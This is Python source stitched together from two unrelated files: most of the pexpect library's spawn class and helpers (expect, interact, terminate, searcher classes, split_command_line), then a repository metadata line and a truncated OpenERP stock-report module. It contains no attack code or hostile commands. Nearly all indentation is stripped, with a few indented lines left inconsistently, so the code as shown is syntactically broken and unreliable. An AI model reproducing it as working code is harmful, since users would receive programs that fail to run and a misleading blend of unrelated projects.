def write(self, s):
'''This is similar to send() except that there is no return value.
'''
self.send(s)
def writelines(self, sequence):
'''This calls write() for each element in the sequence. The sequence
can be any iterable object producing strings, typically a list of
strings. This does not add line separators. There is no return value.
'''
for s in sequence:
self.write(s)
def send(self, s):
'''Sends string ``s`` to the child process, returning the number of
bytes written. If a logfile is specified, a copy is written to that
log. '''
time.sleep(self.delaybeforesend)
s = self._coerce_send_string(s)
self._log(s, 'send')
return self._send(s)
def _send(self, s):
return os.write(self.child_fd, s)
def sendline(self, s=''):
'''Wraps send(), sending string ``s`` to child process, with os.linesep
automatically appended. Returns number of bytes written. '''
n = self.send(s)
n = n + self.send(self.linesep)
return n
def sendcontrol(self, char):
'''Helper method that wraps send() with mnemonic access for sending control
character to the child (such as Ctrl-C or Ctrl-D). For example, to send
Ctrl-G (ASCII 7, bell, '\a')::
child.sendcontrol('g')
See also, sendintr() and sendeof().
'''
char = char.lower()
a = ord(char)
if a >= 97 and a <= 122:
a = a - ord('a') + 1
return self.send(self._chr(a))
d = {'@': 0, '`': 0,
'[': 27, '{': 27,
'\\': 28, '|': 28,
']': 29, '}': 29,
'^': 30, '~': 30,
'_': 31,
'?': 127}
if char not in d:
return 0
return self.send(self._chr(d[char]))
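# Quick sketch of the mapping above: lowercase letters land on control codes
# 1..26 ('c' -> 3, the Ctrl-C/ETX byte; 'g' -> 7, the '\a' bell), while the
# punctuation table covers the remaining codes ('[' -> 27, ESC).
def _example_control_codes():
    assert ord('c') - ord('a') + 1 == 3
    assert ord('g') - ord('a') + 1 == 7
    assert ord('z') - ord('a') + 1 == 26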
def sendeof(self):
'''This sends an EOF to the child. This sends a character which causes
the pending parent output buffer to be sent to the waiting child
program without waiting for end-of-line. If it is the first character
of the line, the read() in the user program returns 0, which signifies
end-of-file. This means to work as expected a sendeof() has to be
called at the beginning of a line. This method does not send a newline.
It is the responsibility of the caller to ensure the eof is sent at the
beginning of a line. '''
### Hmmm... how do I send an EOF?
###C if ((m = write(pty, *buf, p - *buf)) < 0)
###C return (errno == EWOULDBLOCK) ? n : -1;
#fd = sys.stdin.fileno()
#old = termios.tcgetattr(fd) # remember current state
#attr = termios.tcgetattr(fd)
#attr[3] = attr[3] | termios.ICANON # ICANON must be set to see EOF
#try: # use try/finally to ensure state gets restored
# termios.tcsetattr(fd, termios.TCSADRAIN, attr)
# if hasattr(termios, 'CEOF'):
# os.write(self.child_fd, '%c' % termios.CEOF)
# else:
# # Silly platform does not define CEOF so assume CTRL-D
# os.write(self.child_fd, '%c' % 4)
#finally: # restore state
# termios.tcsetattr(fd, termios.TCSADRAIN, old)
if hasattr(termios, 'VEOF'):
char = ord(termios.tcgetattr(self.child_fd)[6][termios.VEOF])
else:
# platform does not define VEOF so assume CTRL-D
char = 4
self.send(self._chr(char))
def sendintr(self):
'''This sends a SIGINT to the child. It does not require
the SIGINT to be the first character on a line. '''
if hasattr(termios, 'VINTR'):
char = ord(termios.tcgetattr(self.child_fd)[6][termios.VINTR])
else:
# platform does not define VINTR so assume CTRL-C
char = 3
self.send(self._chr(char))
def eof(self):
'''This returns True if the EOF exception was ever raised.
'''
return self.flag_eof
def terminate(self, force=False):
'''This forces a child process to terminate. It starts nicely with
SIGHUP and SIGINT. If "force" is True then it moves on to SIGKILL. This
returns True if the child was terminated. This returns False if the
child could not be terminated. '''
if not self.isalive():
return True
try:
self.kill(signal.SIGHUP)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
self.kill(signal.SIGCONT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
self.kill(signal.SIGINT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
if force:
self.kill(signal.SIGKILL)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
return False
except OSError:
# I think there are kernel timing issues that sometimes cause
# this to happen. I think isalive() reports True, but the
# process is dead to the kernel.
# Make one last attempt to see if the kernel is up to date.
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
def wait(self):
'''This waits until the child exits. This is a blocking call. This will
not read any data from the child, so this will block forever if the
child has unread output and has terminated. In other words, the child
may have printed output then called exit(), but the child is
technically still alive until its output is read by the parent. '''
if self.isalive():
pid, status = os.waitpid(self.pid, 0)
else:
raise ExceptionPexpect('Cannot wait for dead child process.')
if os.WIFEXITED(status):
self.status = status
self.exitstatus = os.WEXITSTATUS(status)
self.signalstatus = None
self.terminated = True
elif os.WIFSIGNALED(status):
self.status = status
self.exitstatus = None
self.signalstatus = os.WTERMSIG(status)
self.terminated = True
elif os.WIFSTOPPED(status):
# You can't call wait() on a child process in the stopped state.
raise ExceptionPexpect('Called wait() on a stopped child ' +
'process. This is not supported. Is some other ' +
'process attempting job control with our child pid?')
return self.exitstatus
def isalive(self):
'''This tests if the child process is running or not. This is
non-blocking. If the child was terminated then this will read the
exitstatus or signalstatus of the child. This returns True if the child
process appears to be running or False if not. It can take literally
SECONDS for Solaris to return the right status. '''
if self.terminated:
return False
if self.flag_eof:
# This is for Linux, which requires the blocking form
# of waitpid to get status of a defunct process.
# This is super-lame. The flag_eof would have been set
# in read_nonblocking(), so this should be safe.
waitpid_options = 0
else:
waitpid_options = os.WNOHANG
try:
pid, status = os.waitpid(self.pid, waitpid_options)
except OSError:
err = sys.exc_info()[1]
# No child processes
if err.errno == errno.ECHILD:
raise ExceptionPexpect('isalive() encountered condition ' +
'where "terminated" is 0, but there was no child ' +
'process. Did someone else call waitpid() ' +
'on our process?')
else:
raise err
# I have to do this twice for Solaris.
# I can't even believe that I figured this out...
# If waitpid() returns 0 it means that no child process
# wishes to report, and the value of status is undefined.
if pid == 0:
try:
### os.WNOHANG) # Solaris!
pid, status = os.waitpid(self.pid, waitpid_options)
except OSError as e:
# This should never happen...
if e.errno == errno.ECHILD:
raise ExceptionPexpect('isalive() encountered condition ' +
'that should never happen. There was no child ' +
'process. Did someone else call waitpid() ' +
'on our process?')
else:
raise
# If pid is still 0 after two calls to waitpid() then the process
# really is alive. This seems to work on all platforms, except for
# Irix which seems to require a blocking call on waitpid or select,
# so I let read_nonblocking take care of this situation
# (unfortunately, this requires waiting through the timeout).
if pid == 0:
return True
if os.WIFEXITED(status):
self.status = status
self.exitstatus = os.WEXITSTATUS(status)
self.signalstatus = None
self.terminated = True
elif os.WIFSIGNALED(status):
self.status = status
self.exitstatus = None
self.signalstatus = os.WTERMSIG(status)
self.terminated = True
elif os.WIFSTOPPED(status):
raise ExceptionPexpect('isalive() encountered condition ' +
'where child process is stopped. This is not ' +
'supported. Is some other process attempting ' +
'job control with our child pid?')
return False
def kill(self, sig):
'''This sends the given signal to the child application. In keeping
with UNIX tradition it has a misleading name. It does not necessarily
kill the child unless you send the right signal. '''
# Same as os.kill, but the pid is given for you.
if self.isalive():
os.kill(self.pid, sig)
def _pattern_type_err(self, pattern):
raise TypeError('got {badtype} ({badobj!r}) as pattern, must be one'
' of: {goodtypes}, pexpect.EOF, pexpect.TIMEOUT'\
.format(badtype=type(pattern),
badobj=pattern,
goodtypes=', '.join([str(ast)\
for ast in self.allowed_string_types])
)
)
def compile_pattern_list(self, patterns):
'''This compiles a pattern-string or a list of pattern-strings.
Patterns must be a StringType, EOF, TIMEOUT, SRE_Pattern, or a list of
those. Patterns may also be None which results in an empty list (you
might do this if waiting for an EOF or TIMEOUT condition without
expecting any pattern).
This is used by expect() when calling expect_list(). Thus expect() is
nothing more than::
cpl = self.compile_pattern_list(pl)
return self.expect_list(cpl, timeout)
If you are using expect() within a loop it may be more
efficient to compile the patterns first and then call expect_list().
This avoids calls in a loop to compile_pattern_list()::
cpl = self.compile_pattern_list(my_pattern)
while some_condition:
...
i = self.expect_list(cpl, timeout)
...
'''
if patterns is None:
return []
if not isinstance(patterns, list):
patterns = [patterns]
# Allow dot to match \n
compile_flags = re.DOTALL
if self.ignorecase:
compile_flags = compile_flags | re.IGNORECASE
compiled_pattern_list = []
for idx, p in enumerate(patterns):
if isinstance(p, self.allowed_string_types):
p = self._coerce_expect_string(p)
compiled_pattern_list.append(re.compile(p, compile_flags))
elif p is EOF:
compiled_pattern_list.append(EOF)
elif p is TIMEOUT:
compiled_pattern_list.append(TIMEOUT)
elif isinstance(p, type(re.compile(''))):
compiled_pattern_list.append(p)
else:
self._pattern_type_err(p)
return compiled_pattern_list
def expect(self, pattern, timeout=-1, searchwindowsize=-1):
'''This seeks through the stream until a pattern is matched. The
pattern is overloaded and may take several types. The pattern can be a
StringType, EOF, a compiled re, or a list of any of those types.
Strings will be compiled to re types. This returns the index into the
pattern list. If the pattern was not a list this returns index 0 on a
successful match. This may raise exceptions for EOF or TIMEOUT. To
avoid the EOF or TIMEOUT exceptions add EOF or TIMEOUT to the pattern
list. That will cause expect to match an EOF or TIMEOUT condition
instead of raising an exception.
If you pass a list of patterns and more than one matches, the first
match in the stream is chosen. If more than one pattern matches at that
point, the leftmost in the pattern list is chosen. For example::
# the input is 'foobar'
index = p.expect(['bar', 'foo', 'foobar'])
# returns 1('foo') even though 'foobar' is a "better" match
Please note, however, that buffering can affect this behavior, since
input arrives in unpredictable chunks. For example::
# the input is 'foobar'
index = p.expect(['foobar', 'foo'])
# returns 0('foobar') if all input is available at once,
# but returns 1('foo') if parts of the final 'bar' arrive late
After a match is found the instance attributes 'before', 'after' and
'match' will be set. You can see all the data read before the match in
'before'. You can see the data that was matched in 'after'. The
re.MatchObject used in the re match will be in 'match'. If an error
occurred then 'before' will be set to all the data read so far and
'after' and 'match' will be None.
If timeout is -1 then timeout will be set to the self.timeout value.
A list entry may be EOF or TIMEOUT instead of a string. This will
catch these exceptions and return the index of the list entry instead
of raising the exception. The attribute 'after' will be set to the
exception type. The attribute 'match' will be None. This allows you to
write code like this::
index = p.expect(['good', 'bad', pexpect.EOF, pexpect.TIMEOUT])
if index == 0:
do_something()
elif index == 1:
do_something_else()
elif index == 2:
do_some_other_thing()
elif index == 3:
do_something_completely_different()
instead of code like this::
try:
index = p.expect(['good', 'bad'])
if index == 0:
do_something()
elif index == 1:
do_something_else()
except EOF:
do_some_other_thing()
except TIMEOUT:
do_something_completely_different()
These two forms are equivalent. It all depends on what you want. You
can also just expect the EOF if you are waiting for all output of a
child to finish. For example::
p = pexpect.spawn('/bin/ls')
p.expect(pexpect.EOF)
print(p.before)
If you are trying to optimize for speed then see expect_list().
'''
compiled_pattern_list = self.compile_pattern_list(pattern)
return self.expect_list(compiled_pattern_list,
timeout, searchwindowsize)
def expect_list(self, pattern_list, timeout=-1, searchwindowsize=-1):
'''This takes a list of compiled regular expressions and returns the
index into the pattern_list that matched the child output. The list may
also contain EOF or TIMEOUT (which are not compiled regular
expressions). This method is similar to the expect() method except that
expect_list() does not recompile the pattern list on every call. This
may help if you are trying to optimize for speed, otherwise just use
the expect() method. This is called by expect(). If timeout==-1 then
the self.timeout value is used. If searchwindowsize==-1 then the
self.searchwindowsize value is used. '''
return self.expect_loop(searcher_re(pattern_list),
timeout, searchwindowsize)
def expect_exact(self, pattern_list, timeout=-1, searchwindowsize=-1):
'''This is similar to expect(), but uses plain string matching instead
of compiled regular expressions in 'pattern_list'. The 'pattern_list'
may be a string; a list or other sequence of strings; or TIMEOUT and
EOF.
This call might be faster than expect() for two reasons: string
searching is faster than RE matching and it is possible to limit the
search to just the end of the input buffer.
This method is also useful when you don't want to have to worry about
escaping regular expression characters that you want to match.'''
if (isinstance(pattern_list, self.allowed_string_types) or
pattern_list in (TIMEOUT, EOF)):
pattern_list = [pattern_list]
def prepare_pattern(pattern):
if pattern in (TIMEOUT, EOF):
return pattern
if isinstance(pattern, self.allowed_string_types):
return self._coerce_expect_string(pattern)
self._pattern_type_err(pattern)
try:
pattern_list = iter(pattern_list)
except TypeError:
self._pattern_type_err(pattern_list)
pattern_list = [prepare_pattern(p) for p in pattern_list]
return self.expect_loop(searcher_string(pattern_list),
timeout, searchwindowsize)
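# A brief illustrative sketch (the child command and prompt are assumptions,
# not part of this module): expect_exact() treats the pattern as a literal
# string, so regex metacharacters such as '$' need no escaping:
#
#     child = spawn('/bin/sh')
#     child.expect_exact('$ ')        # literal '$ ', no re.escape() needed
#     child.sendline('echo hello')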
def expect_loop(self, searcher, timeout=-1, searchwindowsize=-1):
'''This is the common loop used inside expect. The 'searcher' should be
an instance of searcher_re or searcher_string, which describes how and
what to search for in the input.
See expect() for other arguments, return value and exceptions. '''
self.searcher = searcher
if timeout == -1:
timeout = self.timeout
if timeout is not None:
end_time = time.time() + timeout
if searchwindowsize == -1:
searchwindowsize = self.searchwindowsize
try:
incoming = self.buffer
freshlen = len(incoming)
while True:
# Keep reading until exception or return.
index = searcher.search(incoming, freshlen, searchwindowsize)
if index >= 0:
self.buffer = incoming[searcher.end:]
self.before = incoming[: searcher.start]
self.after = incoming[searcher.start: searcher.end]
self.match = searcher.match
self.match_index = index
return self.match_index
# No match at this point
if (timeout is not None) and (timeout < 0):
raise TIMEOUT('Timeout exceeded in expect_any().')
# Still have time left, so read more data
c = self.read_nonblocking(self.maxread, timeout)
freshlen = len(c)
time.sleep(0.0001)
incoming = incoming + c
if timeout is not None:
timeout = end_time - time.time()
except EOF:
err = sys.exc_info()[1]
self.buffer = self.string_type()
self.before = incoming
self.after = EOF
index = searcher.eof_index
if index >= 0:
self.match = EOF
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise EOF(str(err) + '\n' + str(self))
except TIMEOUT:
err = sys.exc_info()[1]
self.buffer = incoming
self.before = incoming
self.after = TIMEOUT
index = searcher.timeout_index
if index >= 0:
self.match = TIMEOUT
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise TIMEOUT(str(err) + '\n' + str(self))
except:
self.before = incoming
self.after = None
self.match = None
self.match_index = None
raise
def getwinsize(self):
'''This returns the terminal window size of the child tty. The return
value is a tuple of (rows, cols). '''
TIOCGWINSZ = getattr(termios, 'TIOCGWINSZ', 1074295912)
s = struct.pack('HHHH', 0, 0, 0, 0)
x = fcntl.ioctl(self.child_fd, TIOCGWINSZ, s)
return struct.unpack('HHHH', x)[0:2]
def setwinsize(self, rows, cols):
'''This sets the terminal window size of the child tty. This will cause
a SIGWINCH signal to be sent to the child. This does not change the
physical window size. It changes the size reported to TTY-aware
applications like vi or curses -- applications that respond to the
SIGWINCH signal. '''
# Check for buggy platforms. Some Python versions on some platforms
# (notably OSF1 Alpha and RedHat 7.1) truncate the value for
# termios.TIOCSWINSZ. It is not clear why this happens.
# These platforms don't seem to handle the signed int very well;
# yet other platforms like OpenBSD have a large negative value for
# TIOCSWINSZ and they don't have a truncate problem.
# Newer versions of Linux have totally different values for TIOCSWINSZ.
# Note that this fix is a hack.
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
if TIOCSWINSZ == 2148037735:
# Same bits, but with sign.
TIOCSWINSZ = -2146929561
# Note, assume ws_xpixel and ws_ypixel are zero.
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(self.fileno(), TIOCSWINSZ, s)
def interact(self, escape_character=chr(29),
input_filter=None, output_filter=None):
'''This gives control of the child process to the interactive user (the
human at the keyboard). Keystrokes are sent to the child process, and
the stdout and stderr output of the child process is printed. This
simply echos the child stdout and child stderr to the real stdout and
it echos the real stdin to the child stdin. When the user types the
escape_character this method will stop. The default for
escape_character is ^]. This should not be confused with ASCII 27 --
the ESC character. ASCII 29 was chosen for historical merit because
this is the character used by 'telnet' as the escape character. The
escape_character will not be sent to the child process.
You may pass in optional input and output filter functions. These
functions should take a string and return a string. The output_filter
will be passed all the output from the child process. The input_filter
will be passed all the keyboard input from the user. The input_filter
is run BEFORE the check for the escape_character.
Note that if you change the window size of the parent the SIGWINCH
signal will not be passed through to the child. If you want the child
window size to change when the parent's window size changes then do
something like the following example::
import pexpect, struct, fcntl, termios, signal, sys
def sigwinch_passthrough (sig, data):
s = struct.pack("HHHH", 0, 0, 0, 0)
a = struct.unpack('hhhh', fcntl.ioctl(sys.stdout.fileno(),
termios.TIOCGWINSZ , s))
global p
p.setwinsize(a[0],a[1])
# Note this 'p' is global and used in sigwinch_passthrough.
p = pexpect.spawn('/bin/bash')
signal.signal(signal.SIGWINCH, sigwinch_passthrough)
p.interact()
'''
# Flush the buffer.
self.write_to_stdout(self.buffer)
self.stdout.flush()
self.buffer = self.string_type()
mode = tty.tcgetattr(self.STDIN_FILENO)
tty.setraw(self.STDIN_FILENO)
if PY3:
escape_character = escape_character.encode('latin-1')
try:
self.__interact_copy(escape_character, input_filter, output_filter)
finally:
tty.tcsetattr(self.STDIN_FILENO, tty.TCSAFLUSH, mode)
def __interact_writen(self, fd, data):
'''This is used by the interact() method.
'''
while data != b'' and self.isalive():
n = os.write(fd, data)
data = data[n:]
def __interact_read(self, fd):
'''This is used by the interact() method.
'''
return os.read(fd, 1000)
def __interact_copy(self, escape_character=None,
input_filter=None, output_filter=None):
'''This is used by the interact() method.
'''
while self.isalive():
r, w, e = self.__select([self.child_fd, self.STDIN_FILENO], [], [])
if self.child_fd in r:
try:
    data = self.__interact_read(self.child_fd)
except OSError as e:
    # The subprocess may have closed before we get to reading it
    if e.errno != errno.EIO:
        raise
    # EIO means the child pty has gone away (Linux-style EOF);
    # 'data' is unbound here, so stop copying instead of falling
    # through with stale data.
    break
if output_filter:
data = output_filter(data)
if self.logfile is not None:
self.logfile.write(data)
self.logfile.flush()
os.write(self.STDOUT_FILENO, data)
if self.STDIN_FILENO in r:
data = self.__interact_read(self.STDIN_FILENO)
if input_filter:
data = input_filter(data)
i = data.rfind(escape_character)
if i != -1:
data = data[:i]
self.__interact_writen(self.child_fd, data)
break
self.__interact_writen(self.child_fd, data)
def __select(self, iwtd, owtd, ewtd, timeout=None):
'''This is a wrapper around select.select() that ignores signals. If
select.select raises a select.error exception and errno is an EINTR
error then it is ignored. Mainly this is used to ignore sigwinch
(terminal resize). '''
# if select() is interrupted by a signal (errno==EINTR) then
# we loop back and enter the select() again.
if timeout is not None:
end_time = time.time() + timeout
while True:
try:
return select.select(iwtd, owtd, ewtd, timeout)
except select.error:
err = sys.exc_info()[1]
if err.args[0] == errno.EINTR:
# if we loop back we have to subtract the
# amount of time we already waited.
if timeout is not None:
timeout = end_time - time.time()
if timeout < 0:
return([], [], [])
else:
# something else caused the select.error, so
# this actually is an exception.
raise
##############################################################################
# The following methods are no longer supported or allowed.
def setmaxread(self, maxread):
'''This method is no longer supported or allowed. I don't like getters
and setters without a good reason. '''
raise ExceptionPexpect('This method is no longer supported ' +
'or allowed. Just assign a value to the ' +
'maxread member variable.')
def setlog(self, fileobject):
'''This method is no longer supported or allowed.
'''
raise ExceptionPexpect('This method is no longer supported ' +
'or allowed. Just assign a value to the logfile ' +
'member variable.')
##############################################################################
# End of spawn class
##############################################################################
class spawnu(spawn):
"""Works like spawn, but accepts and returns unicode strings.
Extra parameters:
:param encoding: The encoding to use for communications (default: 'utf-8')
:param errors: How to handle encoding/decoding errors; one of 'strict'
(the default), 'ignore', or 'replace', as described
for :meth:`~bytes.decode` and :meth:`~str.encode`.
"""
if PY3:
string_type = str
allowed_string_types = (str, )
_chr = staticmethod(chr)
linesep = os.linesep
else:
string_type = unicode
allowed_string_types = (unicode, )
_chr = staticmethod(unichr)
linesep = os.linesep.decode('ascii')
# This can handle unicode in both Python 2 and 3
write_to_stdout = sys.stdout.write
def __init__(self, *args, **kwargs):
self.encoding = kwargs.pop('encoding', 'utf-8')
self.errors = kwargs.pop('errors', 'strict')
self._decoder = codecs.getincrementaldecoder(self.encoding)(errors=self.errors)
super(spawnu, self).__init__(*args, **kwargs)
@staticmethod
def _coerce_expect_string(s):
return s
@staticmethod
def _coerce_send_string(s):
return s
def _coerce_read_string(self, s):
return self._decoder.decode(s, final=False)
def _send(self, s):
return os.write(self.child_fd, s.encode(self.encoding, self.errors))
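# A minimal usage sketch for spawnu (assumes a Unix-like system with
# /bin/echo available); all strings crossing the boundary are unicode,
# decoded/encoded with the 'encoding' parameter described above:
#
#     child = spawnu('/bin/echo', [u'h\xe9llo'])
#     child.expect(EOF)
#     print(child.before)      # a unicode str, decoded as UTF-8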
class searcher_string(object):
'''This is a plain string search helper for the spawn.expect_any() method.
This helper class is for speed. For more powerful regex patterns
see the helper class, searcher_re.
Attributes:
eof_index - index of EOF, or -1
timeout_index - index of TIMEOUT, or -1
After a successful match by the search() method the following attributes
are available:
start - index into the buffer, first byte of match
end - index into the buffer, first byte after match
match - the matching string itself
'''
def __init__(self, strings):
'''This creates an instance of searcher_string. The argument 'strings'
may be a list or other sequence of strings, optionally including the
EOF or TIMEOUT types. '''
self.eof_index = -1
self.timeout_index = -1
self._strings = []
for n, s in enumerate(strings):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._strings.append((n, s))
def __str__(self):
'''This returns a human-readable string that represents the state of
the object.'''
ss = [(ns[0], ' %d: "%s"' % ns) for ns in self._strings]
ss.append((-1, 'searcher_string:'))
if self.eof_index >= 0:
ss.append((self.eof_index, ' %d: EOF' % self.eof_index))
if self.timeout_index >= 0:
ss.append((self.timeout_index,
' %d: TIMEOUT' % self.timeout_index))
ss.sort()
ss = list(zip(*ss))[1]
return '\n'.join(ss)
def search(self, buffer, freshlen, searchwindowsize=None):
'''This searches 'buffer' for the first occurrence of one of the search
strings. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before. It helps to avoid
searching the same, possibly big, buffer over and over again.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, this returns -1. '''
first_match = None
# 'freshlen' helps a lot here. Further optimizations could
# possibly include:
#
# using something like the Boyer-Moore Fast String Searching
# Algorithm; pre-compiling the search through a list of
# strings into something that can scan the input once to
# search for all N strings; realize that if we search for
# ['bar', 'baz'] and the input is '...foo' we need not bother
# rescanning until we've read three more bytes.
#
# Sadly, I don't know enough about this interesting topic. /grahn
for index, s in self._strings:
if searchwindowsize is None:
# the match, if any, can only be in the fresh data,
# or at the very end of the old data
offset = -(freshlen + len(s))
else:
# better obey searchwindowsize
offset = -searchwindowsize
n = buffer.find(s, offset)
if n >= 0 and (first_match is None or n < first_match):
first_match = n
best_index, best_match = index, s
if first_match is None:
return -1
self.match = best_match
self.start = first_match
self.end = self.start + len(self.match)
return best_index
class searcher_re(object):
'''This is regular expression string search helper for the
spawn.expect_any() method. This helper class is for powerful
pattern matching. For speed, see the helper class, searcher_string.
Attributes:
eof_index - index of EOF, or -1
timeout_index - index of TIMEOUT, or -1
After a successful match by the search() method the following attributes
are available:
start - index into the buffer, first byte of match
end - index into the buffer, first byte after match
match - the re.match object returned by a successful re.search
'''
def __init__(self, patterns):
'''This creates an instance that searches for 'patterns' Where
'patterns' may be a list or other sequence of compiled regular
expressions, or the EOF or TIMEOUT types.'''
self.eof_index = -1
self.timeout_index = -1
self._searches = []
for n, s in enumerate(patterns):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._searches.append((n, s))
def __str__(self):
'''This returns a human-readable string that represents the state of
the object.'''
ss = list()
for n, s in self._searches:
try:
ss.append((n, ' %d: re.compile("%s")' % (n, s.pattern)))
except UnicodeEncodeError:
# for test cases that display __str__ of searches, don't raise
# another exception just because stdout is ascii-only; fall back
# to repr()
ss.append((n, ' %d: re.compile(%r)' % (n, s.pattern)))
ss.append((-1, 'searcher_re:'))
if self.eof_index >= 0:
ss.append((self.eof_index, ' %d: EOF' % self.eof_index))
if self.timeout_index >= 0:
ss.append((self.timeout_index, ' %d: TIMEOUT' %
self.timeout_index))
ss.sort()
ss = list(zip(*ss))[1]
return '\n'.join(ss)
def search(self, buffer, freshlen, searchwindowsize=None):
'''This searches 'buffer' for the first occurrence of one of the regular
expressions. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, returns -1.'''
first_match = None
# 'freshlen' doesn't help here -- we cannot predict the
# length of a match, and the re module provides no help.
if searchwindowsize is None:
searchstart = 0
else:
searchstart = max(0, len(buffer) - searchwindowsize)
for index, s in self._searches:
match = s.search(buffer, searchstart)
if match is None:
continue
n = match.start()
if first_match is None or n < first_match:
first_match = n
the_match = match
best_index = index
if first_match is None:
return -1
self.start = first_match
self.match = the_match
self.end = self.match.end()
return best_index
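# Illustrative sketch (the prompt patterns are hypothetical): expect_list()
# simply wraps the compiled patterns in a searcher_re and hands it to
# expect_loop(), so the two calls below are equivalent:
#
#     cpl = child.compile_pattern_list([r'login: ', r'password: '])
#     child.expect_list(cpl)
#     child.expect_loop(searcher_re(cpl))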
def which(filename):
'''This takes a given filename; tries to find it in the environment path;
then checks if it is executable. This returns the full path to the filename
if found and executable. Otherwise this returns None.'''
# Special case where filename contains an explicit path.
if os.path.dirname(filename) != '':
if os.access(filename, os.X_OK):
return filename
if 'PATH' not in os.environ or os.environ['PATH'] == '':
p = os.defpath
else:
p = os.environ['PATH']
pathlist = p.split(os.pathsep)
for path in pathlist:
ff = os.path.join(path, filename)
if os.access(ff, os.X_OK):
return ff
return None
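# A minimal usage sketch for which() (paths shown are hypothetical and
# platform dependent):
#
#     which('ls')           # -> '/bin/ls' on most systems, or None
#     which('/bin/ls')      # explicit path: returned as-is if executable
#     which('nonexistent')  # -> None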
def split_command_line(command_line):
'''This splits a command line into a list of arguments. It splits arguments
on spaces, but handles embedded quotes, doublequotes, and escaped
characters. It's impossible to do this with a regular expression, so I
wrote a little state machine to parse the command line. '''
arg_list = []
arg = ''
# Constants to name the states we can be in.
state_basic = 0
state_esc = 1
state_singlequote = 2
state_doublequote = 3
# The state when consuming whitespace between commands.
state_whitespace = 4
state = state_basic
for c in command_line:
if state == state_basic or state == state_whitespace:
if c == '\\':
# Escape the next character
state = state_esc
elif c == r"'":
# Handle single quote
state = state_singlequote
elif c == r'"':
# Handle double quote
state = state_doublequote
elif c.isspace():
# Add arg to arg_list if we aren't in the middle of whitespace.
if state == state_whitespace:
    # Already between arguments; nothing to do.
    pass
else:
arg_list.append(arg)
arg = ''
state = state_whitespace
else:
arg = arg + c
state = state_basic
elif state == state_esc:
arg = arg + c
state = state_basic
elif state == state_singlequote:
if c == r"'":
state = state_basic
else:
arg = arg + c
elif state == state_doublequote:
if c == r'"':
state = state_basic
else:
arg = arg + c
if arg != '':
arg_list.append(arg)
return arg_list
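# A short illustrative sketch of split_command_line() (expected results
# follow from the state machine above):
#
#     split_command_line('ls -l "My Documents"')
#     # -> ['ls', '-l', 'My Documents']
#     split_command_line("echo it\\'s here")
#     # -> ['echo', "it's", 'here']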
# vi:set sr et ts=4 sw=4 ft=python :
| mit |
bwrsandman/OpenUpgrade | addons/stock/report/product_stock.py | 376 | 4868 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime
from dateutil.relativedelta import relativedelta
import openerp
from openerp import osv
import time
from openerp.report.interface import report_int
from openerp.report.render import render
import stock_graph
import StringIO
import unicodedata
class external_pdf(render):
def __init__(self, pdf):
render.__init__(self)
self.pdf = pdf
self.output_type='pdf'
def _render(self):
return self.pdf
class report_stock(report_int):
def create(self, cr, uid, ids, datas, context=None):
if context is None:
context = {}
registry = openerp.registry(cr.dbname)
product_ids = ids
if 'location_id' in context:
location_id = context['location_id']
else:
warehouse_id = registry['stock.warehouse'].search(cr, uid, [])[0]
location_id = registry['stock.warehouse'].browse(cr, uid, warehouse_id).lot_stock_id.id
loc_ids = registry['stock.location'].search(cr, uid, [('location_id','child_of',[location_id])])
now = time.strftime('%Y-%m-%d')
dt_from = now
dt_to = now
names = dict(registry['product.product'].name_get(cr, uid, product_ids))
for name in names:
names[name] = names[name].encode('utf8')
products = {}
ctx = context.copy()
ctx['location_id'] = loc_ids
prods = registry['product.product']._product_available(cr, uid, product_ids, context=ctx)
for prod in prods.keys():
products[prod] = [(now, prods[prod]['qty_available'])]
prods[prod] = 0
if not loc_ids or not product_ids:
return (False, 'pdf')
cr.execute("select sum(r.product_qty * u.factor), r.date, r.product_id "
"from stock_move r left join product_uom u on (r.product_uom=u.id) "
"where state IN %s"
"and location_id IN %s"
"and product_id IN %s"
"group by date,product_id",(('confirmed','assigned','waiting'),tuple(loc_ids) ,tuple(product_ids),))
for (qty, dt, prod_id) in cr.fetchall():
if dt<=dt_from:
dt= (datetime.now() + relativedelta(days=1)).strftime('%Y-%m-%d')
else:
dt = dt[:10]
products.setdefault(prod_id, [])
products[prod_id].append((dt,-qty))
cr.execute("select sum(r.product_qty * u.factor), r.date, r.product_id "
"from stock_move r left join product_uom u on (r.product_uom=u.id) "
"where state IN %s"
"and location_dest_id IN %s"
"and product_id IN %s"
"group by date,product_id",(('confirmed','assigned','waiting'),tuple(loc_ids) ,tuple(product_ids),))
for (qty, dt, prod_id) in cr.fetchall():
if dt<=dt_from:
dt= (datetime.now() + relativedelta(days=1)).strftime('%Y-%m-%d')
else:
dt = dt[:10]
products.setdefault(prod_id, [])
products[prod_id].append((dt,qty))
dt = dt_from
qty = 0
io = StringIO.StringIO()
gt = stock_graph.stock_graph(io)
for prod_id in products:
prod_name = names.get(prod_id,'Unknown')
if isinstance(prod_name, str):
prod_name = prod_name.decode('utf-8')
